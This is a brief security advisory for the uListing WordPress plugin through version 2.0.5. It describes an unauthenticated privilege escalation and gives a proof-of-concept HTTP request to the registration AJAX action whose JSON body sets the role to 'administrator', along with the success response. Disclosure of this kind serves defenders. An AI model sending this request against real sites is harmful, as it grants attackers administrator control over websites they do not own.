uListing < 2.0.6 - Unauthenticated Privilege Escalation

An Unauthenticated Privilege Escalation vulnerability was discovered in the uListing plugin through v2.0.5 for WordPress. User registration must be allowed on the target website.

PoC

PoC | Unauthenticated Privilege Escalation | Request: POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/2 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json;charset=utf-8 X-Requested-With: XMLHttpRequest Content-Length: 205 {“login”:“Visse”,“first_name”:“Visse”,“last_name”:“Visse”,“email”:“[email protected]”,“role”:“administrator”,“password”:“admin”,“password_repeat”:“admin”,“nonce”:“ac88e123d8”,“custom_fields”:{}} PoC | Unauthenticated Privilege Escalation | Response: {“errors”:[],“message”:“Registration completed successfully.”,“status”:“success”}